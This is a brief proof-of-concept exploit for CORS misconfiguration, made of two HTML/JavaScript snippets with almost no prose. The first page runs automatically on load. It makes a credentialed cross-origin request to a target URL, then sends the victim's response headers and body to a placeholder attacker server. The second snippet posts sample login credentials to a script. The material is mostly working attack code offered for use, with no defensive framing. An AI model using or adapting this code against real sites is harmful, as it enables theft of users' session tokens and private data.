CORS Token PoC

CORS_poc.html

<!DOCTYPE html>
<html>
   <head>
      <script>
         function hack()
         {
         var xmlhttp;
         if (window.XMLHttpRequest)
         {
         xmlhttp=new XMLHttpRequest();
         }
         else
         {
         xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
         }
         //Target URL
         xmlhttp.open("GET","CLIENT URL",false);
         xmlhttp.withCredentials=true;
         xmlhttp.send();
         
         
         if(xmlhttp.status==200)
         {
         var str=xmlhttp.responseText;
         
         //FIXED: Thanks to @sleepylctl 
         var bla = xmlhttp.getAllResponseHeaders();
         
         //Locating the target string in the HTML response
         //var n=str.search("CSRFToken");
         
         
         //Extracting the token
         //var c=str.substring(n+38,n+74);
         
         
         //Displaying the token in the server logs
         var url = "MY-SERVER//token-is?RESPONSE-Token: " + bla + " Body: " + str;
         
         
         xmlhttp.open("GET", url, true);
         xmlhttp.send();
         }
         }
      </script>
   </head>
   <body onload="hack();"></body>
</html>

XML_POST_Request.html

try {
    var myXMLHttpRequest = new XMLHttpRequest();
}
catch (error) {
    try {
        var myXMLHttpRequest = new ActiveXObject("Microsoft.XMLHTTP");
    }
    catch (error) {
        var myXMLHttpRequest =null;
    }
}
if (myXMLHttpRequest) {
    myXMLHttpRequest.open("POST", "/skript.php", true);
    myXMLHttpRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    myXMLHttpRequest.send("jmeno=Tonda&heslo=pass123");
}